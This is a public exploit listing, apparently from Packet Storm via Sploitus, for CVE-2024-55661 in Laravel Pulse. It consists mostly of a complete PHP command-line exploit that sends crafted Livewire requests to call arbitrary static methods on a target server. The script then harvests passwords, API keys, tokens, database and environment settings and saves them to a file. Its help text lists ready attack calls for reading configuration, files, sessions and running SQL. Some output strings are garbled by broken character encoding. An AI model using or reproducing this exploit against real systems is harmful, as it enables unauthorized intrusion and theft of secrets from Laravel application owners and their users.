Share
## https://sploitus.com/exploit?id=PACKETSTORM:213032
=============================================================================================================================================
    | # Title     : Laravel Pulse 1.3.1 Arbitrary Code Injection                                                                                |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |
    | # Vendor    : https://pulse.laravel.com/                                                                                                  |
    =============================================================================================================================================
    
    [+] References : https://packetstorm.news/files/id/200719/ & 	CVE-2024-55661 
    
    [+] Summary : 
                The vulnerability exists in the RemembersQueries trait within Laravel Pulse, specifically in the remember() method which improperly handles user-controlled callable parameters.
    			
    			
    [+]  POC : 
    #!/usr/bin/env php
    <?php
    /**
     * Laravel Pulse < 1.3.1 - Arbitrary Code Injection Exploit (CVE-2024-55661)
     * Author: Mohammed Idrees Banyamer (@banyamer_security)
     * PHP CLI Version - indoushka
     */
    
    if (php_sapi_name() !== 'cli') {
        die("โŒ This script must be run from command line only\n");
    }
    
    class LaravelPulseExploit {
        private $url;
        private $component;
        private $method;
        private $csrf;
        private $key;
        private $component_id;
    
        public function __construct($url, $component, $method, $csrf = null, $key = 'exploit', $component_id = 'abcde') {
            $this->url = rtrim($url, '/');
            $this->component = $component;
            $this->method = $method;
            $this->csrf = $csrf;
            $this->key = $key;
            $this->component_id = $component_id;
        }
    
        private function buildPayload() {
            return [
                "type" => "callMethod",
                "method" => "remember",
                "params" => [$this->method, $this->key],
                "id" => $this->component_id,
                "name" => $this->component
            ];
        }
    
        public function send() {
            $full_url = $this->url . '/livewire/message/' . $this->component;
            $payload = $this->buildPayload();
            
            $this->showBanner();
            
            echo "๐Ÿ” [INFO] Attack Details:\n";
            echo "โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€\n";
            echo "๐ŸŽฏ Target:          " . $this->url . "\n";
            echo "โš™๏ธ  Component:       " . $this->component . "\n";
            echo "๐Ÿ› ๏ธ  Method:          " . $this->method . "\n";
            echo "๐Ÿ”‘ Key:             " . $this->key . "\n";
            echo "๐Ÿ†” Component ID:    " . $this->component_id . "\n";
            echo "โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€\n\n";
    
            echo "๐Ÿš€ [*] Sending exploit to: " . $full_url . "\n";
    
            $headers = [
                "Content-Type: application/json",
                "X-Livewire: true",
                "Accept: application/json"
            ];
    
            if ($this->csrf) {
                $headers[] = "X-CSRF-TOKEN: " . $this->csrf;
            }
    
            $ch = curl_init();
            curl_setopt_array($ch, [
                CURLOPT_URL => $full_url,
                CURLOPT_POST => true,
                CURLOPT_HTTPHEADER => $headers,
                CURLOPT_POSTFIELDS => json_encode($payload),
                CURLOPT_RETURNTRANSFER => true,
                CURLOPT_TIMEOUT => 10,
                CURLOPT_SSL_VERIFYPEER => false,
                CURLOPT_FOLLOWLOCATION => true,
                CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
            ]);
    
            $response = curl_exec($ch);
            $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
            $error = curl_error($ch);
            curl_close($ch);
    
            if ($error) {
                echo "โŒ [-] Request failed: " . $error . "\n";
                exit(1);
            }
    
            $this->displayResponse($http_code, $response);
        }
    
        private function displayResponse($http_code, $response) {
            echo "\n๐Ÿ“Š [RESULTS] Exploitation Results:\n";
            echo "โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€\n";
            echo "๐Ÿ“ก Status Code: " . $this->colorizeHttpCode($http_code) . "\n";
            
            if ($http_code == 200) {
                $data = json_decode($response, true);
                if (json_last_error() === JSON_ERROR_NONE) {
                    echo "โœ… JSON decoded successfully\n";
                    echo "โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€\n";
                    
                    // Display formatted data
                    $this->displayFormattedData($data);
                    
                    // Search for sensitive data
                    $this->extractSensitiveData($data);
                    
                    // Save results to file
                    $this->saveResults($data);
                } else {
                    echo "โŒ Failed to decode JSON\n";
                    echo "๐Ÿ“„ Raw content:\n" . $response . "\n";
                }
            } else {
                echo "โŒ Unexpected server response\n";
                echo "๐Ÿ“„ Content:\n" . $response . "\n";
            }
        }
    
        private function displayFormattedData($data) {
            if (isset($data['effects']['html'])) {
                echo "๐Ÿ“ Retrieved HTML:\n";
                echo substr($data['effects']['html'], 0, 500) . "...\n";
            }
            
            if (isset($data['data'])) {
                echo "๐Ÿ’พ Retrieved Data:\n";
                foreach ($data['data'] as $key => $value) {
                    if (is_string($value) && strlen($value) > 100) {
                        echo "  ๐Ÿ“ {$key}: " . substr($value, 0, 100) . "...\n";
                    } else {
                        echo "  ๐Ÿ“ {$key}: " . json_encode($value) . "\n";
                    }
                }
            }
        }
    
        private function extractSensitiveData($data) {
            echo "\n๐Ÿ” [SENSITIVE DATA] Searching for sensitive information:\n";
            echo "โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€\n";
            
            $sensitive_patterns = [
                'password' => '/password|pwd|pass/i',
                'key' => '/key|secret|token|api_key/i',
                'database' => '/db_|database|mysql|pgsql/i',
                'config' => '/config|setting|env/i'
            ];
    
            $found_data = [];
    
            array_walk_recursive($data, function($value, $key) use (&$found_data, $sensitive_patterns) {
                if (is_string($key)) {
                    foreach ($sensitive_patterns as $type => $pattern) {
                        if (preg_match($pattern, $key) && !empty($value)) {
                            $found_data[$type][] = [
                                'key' => $key,
                                'value' => substr(strval($value), 0, 200)
                            ];
                        }
                    }
                }
            });
    
            foreach ($found_data as $type => $items) {
                echo "โš ๏ธ  " . strtoupper($type) . ":\n";
                foreach ($items as $item) {
                    echo "   โ€ข {$item['key']}: {$item['value']}\n";
                }
                echo "\n";
            }
    
            if (empty($found_data)) {
                echo "โœ… No obvious sensitive data found\n";
            }
        }
    
        private function saveResults($data) {
            $filename = 'laravel_pulse_results_' . date('Y-m-d_His') . '.json';
            file_put_contents($filename, json_encode($data, JSON_PRETTY_PRINT | JSON_UNESCAPED_UNICODE));
            echo "๐Ÿ’พ [SAVED] Results saved to: {$filename}\n";
        }
    
        private function colorizeHttpCode($code) {
            if ($code >= 200 && $code < 300) {
                return "โœ… {$code}";
            } elseif ($code >= 400 && $code < 500) {
                return "โš ๏ธ  {$code}";
            } elseif ($code >= 500) {
                return "โŒ {$code}";
            } else {
                return "๐Ÿ”ต {$code}";
            }
        }
    
        private function showBanner() {
            echo "
    โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
    โ”‚                    LARAVEL PULSE EXPLOIT                    โ”‚
    โ”‚                  CVE-2024-55661 - PHP CLI                   โ”‚
    โ”‚                Author: indoushka                            โ”‚
    โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜\n\n";
        }
    }
    
    function showHelp() {
        echo "
    ๐Ÿ“– USAGE:
    โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
    
    ๐Ÿ› ๏ธ  Basic Usage:
      php laravel_exploit.php -u URL -c COMPONENT -m METHOD
    
    ๐Ÿ“‹ Required Options:
      -u, --url        Laravel application URL (e.g., http://example.com)
      -c, --component  Livewire component name (e.g., pulse.livewire.config-component)
      -m, --method     Static method to call
    
    ๐Ÿ“Œ Additional Options:
      -k, --key        Cache key (default: exploit)
      --csrf           Optional CSRF token
      --id             Component ID (default: abcde)
      -h, --help       Show this help
    
    ๐ŸŽฏ Practical Examples:
      php laravel_exploit.php -u http://localhost -c pulse.livewire.config-component -m '\\\Illuminate\\\Support\\\Facades\\\Config::all'
      
      php laravel_exploit.php -u https://target.com -c pulse.livewire.config-component -m '\\\Illuminate\\\Support\\\Facades\\\DB::select' -k db_test
      
      php laravel_exploit.php -u http://app.test -c pulse.livewire.config-component -m '\\\Illuminate\\\Support\\\Facades\\\File::get' --csrf token123
    
    ๐Ÿ”ง Common Exploitation Methods:
      โ€ข \\Illuminate\\Support\\Facades\\Config::all    - Get all configuration
      โ€ข \\Illuminate\\Support\\Facades\\DB::select     - Execute SQL queries
      โ€ข \\Illuminate\\Support\\Facades\\File::get      - Read files
      โ€ข \\Illuminate\\Support\\Facades\\Env::get       - Get environment variables
      โ€ข \\Illuminate\\Support\\Facades\\Session::all   - Get session data
    
    โš ๏ธ  Note: For ethical use in authorized penetration testing only
    \n";
    }
    
    function parseArguments() {
        $options = getopt("u:c:m:k:h", ["url:", "component:", "method:", "key:", "csrf:", "id:", "help"]);
        
        if (isset($options['h']) || isset($options['help'])) {
            showHelp();
            exit(0);
        }
        
        $missing = [];
        if (!isset($options['u']) && !isset($options['url'])) $missing[] = "URL (-u)";
        if (!isset($options['c']) && !isset($options['component'])) $missing[] = "Component (-c)";
        if (!isset($options['m']) && !isset($options['method'])) $missing[] = "Method (-m)";
        
        if (!empty($missing)) {
            echo "โŒ Missing required parameters:\n";
            foreach ($missing as $error) {
                echo "   โ€ข {$error} is required\n";
            }
            echo "\n";
            showHelp();
            exit(1);
        }
        
        return [
            'url' => $options['u'] ?? $options['url'] ?? null,
            'component' => $options['c'] ?? $options['component'] ?? null,
            'method' => $options['m'] ?? $options['method'] ?? null,
            'key' => $options['k'] ?? $options['key'] ?? 'exploit',
            'csrf' => $options['csrf'] ?? null,
            'id' => $options['id'] ?? 'abcde'
        ];
    }
    
    // Main execution
    try {
        $args = parseArguments();
        
        $exploit = new LaravelPulseExploit(
            $args['url'],
            $args['component'], 
            $args['method'],
            $args['csrf'],
            $args['key'],
            $args['id']
        );
        
        $exploit->send();
        
    } catch (Exception $e) {
        echo "โŒ Error: " . $e->getMessage() . "\n";
        exit(1);
    }
    ?>
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================